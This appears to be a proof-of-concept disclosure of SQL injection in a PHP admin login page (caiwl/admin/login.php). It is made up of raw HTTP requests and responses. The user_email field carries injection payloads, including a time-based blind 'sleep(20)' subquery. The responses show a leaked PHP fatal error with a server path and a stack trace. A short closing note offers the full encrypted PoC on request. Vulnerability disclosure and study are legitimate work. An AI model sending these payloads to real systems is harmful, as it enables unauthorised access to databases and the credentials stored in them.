MySQL Request-1:
POST / caiwl/ admin/ login .php HTTP/ 1 .1
Host: 192 .168 .1 .4
Origin: http:// 192 .168 .1 .4
Cookie: PHPSESSID= 8qen88airh7u0ai06ijhk96a21
Upgrade- Insecure- Requests: 1
Referer: http:// 192 .168 .1 .4 / caiwl/ admin/ login .php
Content- Type: application/ x- www- form- urlencoded
Accept- Encoding: gzip, deflate
Accept: * /*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90
user_email=IlZWXHcK@nu11secur1tycollaborator.net'&user_pass=m2G%21b5m%21D8&btnLogin=%C2%9E%C3%A9e
MySQL Response-1:
Response 1
HTTP/ 1 .1 200 OK
Date : Mon, 18 Oct 2021 07 :42 :37 GMT
Server: Apache/ 2 .4 .51 (Win64) OpenSSL/ 1 .1 .1l PHP/ 7 .4 .24
X- Powered- By: PHP/ 7 .4 .24
Expires: Thu, 19 Nov 1981 08 :52 :00 GMT
Cache- Control: no- store, no- cache, must- revalidate
Pragma: no- cache
Content- Length: 7099
Connection: close
Content- Type: text / html; charset= UTF- 8
< !-- Bootstrap core CSS -->
< !DOCTYPE html>
< html lang= " en" >
< head>
< title> Login V18< / title>
< meta charset= " UTF-8" >
< meta name= " viewport" content= " width=device-width, initi
...[SNIP]...
<b>Fatal error</b>: Uncaught Error: Call to undefined function mysql_error() in C:\xampp\htdocs\caiwl\include\accounts.php:28
Stack trace:
#0 C:\xampp\htdocs\caiwl\admin\login.php(165): User::userAuthentication('IlZWXHcK@burpco...', '0314337dea4e6aa...')
#1 {main}
thrown in <b>
...[SNIP]...
MySQL Request-2:
POST / caiwl/ admin/ login .php HTTP/ 1 .1
Host: 192 .168 .1 .4
Origin: http:// 192 .168 .1 .4
Cookie: PHPSESSID= 8qen88airh7u0ai06ijhk96a21
Upgrade- Insecure- Requests: 1
Referer: http:// 192 .168 .1 .4 / caiwl/ admin/ login .php
Content- Type: application/ x- www- form- urlencoded
Accept- Encoding: gzip, deflate
Accept: * /*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90
user_email=ICpueGIm@nu11secur1tycollaborator.net''&user_pass=g1M%21g9l%21F1&btnLogin=%C2%9E%C3%A9e
MySQL Response-2
HTTP/ 1 .1 200 OK
Date : Mon, 18 Oct 2021 07 :42 :40 GMT
Server: Apache/ 2 .4 .51 (Win64) OpenSSL/ 1 .1 .1l PHP/ 7 .4 .24
X- Powered- By: PHP/ 7 .4 .24
Expires: Thu, 19 Nov 1981 08 :52 :00 GMT
Cache- Control: no- store, no- cache, must- revalidate
Pragma: no- cache
Content- Length: 6832
Connection: close
Content- Type: text / html; charset= UTF- 8
< !-- Bootstrap core CSS -->
< !DOCTYPE html>
< html lang= " en" >
< head>
< title> Login V18< / title>
< meta charset= " UTF-8" >
< meta name= " viewport" content= " width=device-width, initi
...[SNIP]...
MySQL Request-3
POST / caiwl/ admin/ login .php HTTP/ 1 .1
Host: 192 .168 .1 .4
Origin: http:// 192 .168 .1 .4
Cookie: PHPSESSID= 8qen88airh7u0ai06ijhk96a21
Upgrade- Insecure- Requests: 1
Referer: http:// 192 .168 .1 .4 / caiwl/ admin/ login .php
Content- Type: application/ x- www- form- urlencoded
Accept- Encoding: gzip, deflate
Accept: * /*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 90
user_email=QXVzAYzI@nu11secur1tycollaborator.net'%2b(select*from(select(sleep(20)))a)%2b'&user_pass=u0U%21y2z%21D9&btnLogin=%C2%9E%C3%A9e
MySQL Response-3
HTTP/ 1 .1 200 OK
Date : Mon, 18 Oct 2021 07 :42 :51 GMT
Server: Apache/ 2 .4 .51 (Win64) OpenSSL/ 1 .1 .1l PHP/ 7 .4 .24
X- Powered- By: PHP/ 7 .4 .24
Expires: Thu, 19 Nov 1981 08 :52 :00 GMT
Cache- Control: no- store, no- cache, must- revalidate
Pragma: no- cache
Content- Length: 6811
Connection: close
Content- Type: text / html; charset= UTF- 8
< !-- Bootstrap core CSS -->
< !DOCTYPE html>
< html lang= " en" >
< head>
< title> Login V18< / title>
< meta charset= " UTF-8" >
< meta name= " viewport" content= " width=device-width, initi
...[SNIP]...
Reproduce
href
NOTE:
The PoC will be encrypted, sorry about this dear friends!
If someone wants to see this work, please write me!
KR @nu11secur1ty
Proof:
href